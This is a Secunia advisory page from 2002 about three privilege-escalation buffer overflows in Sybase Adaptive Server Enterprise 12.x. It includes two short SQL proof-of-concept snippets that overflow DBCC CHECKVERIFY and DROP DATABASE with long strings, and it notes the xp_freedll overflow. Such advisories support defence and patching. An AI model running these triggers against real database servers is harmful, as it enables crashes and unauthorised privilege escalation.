Secunia Logo  


Secunia PSI WorldMap
 
Sybase privilege escalation
Secunia Advisory: SA7620
Release Date: 2002-11-28
Popularity: 6,653 views

Critical:
Moderately critical
Impact: Privilege escalation
Where: Local system
Solution Status: Vendor Patch

Software:Sybase Adaptive Server Enterprise 12.x

Secunia CVSS-2 Score: Available in Secunia business solutions

Subscribe: Instant alerts on relevant vulnerabilities


Advisory Content (Page 1 of 3)[ 1 ] [ 2 ] [ 3 ]

Description:
Sybase Adaptive Server 12 and 12.5 has three different flaws allowing non-privileged users to gain privileges.

By passing an argument of more than 45 characters to xp_freedll a buffer overflow is caused.

The DBCC CHECKVERIFY buffer overflow:
declare @test varchar(16384)
select @test = replicate('A', 16384)
DBCC CHECKVERIFY(@test)
go

The DROP DATABASE buffer overflow
declare @test varchar(16384)
select @test = replicate('A', 16384)
DROP DATABASE @test
go

All buffer overflows can be abused to execute arbitrary code with elevated privileges.

Change Page:
[ 1 ] [ 2 ] [ 3 ]



Track this Secunia Advisory
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.

Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.

About this Secunia Advisory
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.

Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
  
Latest Advisories

Send Feedback to Secunia
If you have new information regarding this Secunia advisory or a product in our database, please send it to us using either our web form or email us at vuln@secunia.com.

Ideas, suggestions, and other feedback are most welcome.

Most Popular - 3 Hours

1. Internet Explorer Charset Inheritance Cross-Site Scripting Vulnerability // 70 views
2. Microsoft DirectShow Streaming Video ActiveX Control Buffer Overflow // 60 views
3. Adobe Reader/Acrobat Multiple Vulnerabilities // 29 views
4. Adobe Flash Player Multiple Vulnerabilities // 29 views
5. Sun Java JDK / JRE Multiple Vulnerabilities // 27 views
6. Internet Explorer 7 Window Injection Vulnerability // 24 views
7. Apple Safari Two WebKit Component Vulnerabilities // 21 views
8. Microsoft Word Code Execution Vulnerabilities // 19 views
9. Microsoft Internet Explorer Multiple Vulnerabilities // 16 views
10. Microsoft Word Malformed Object Pointer Vulnerability // 14 views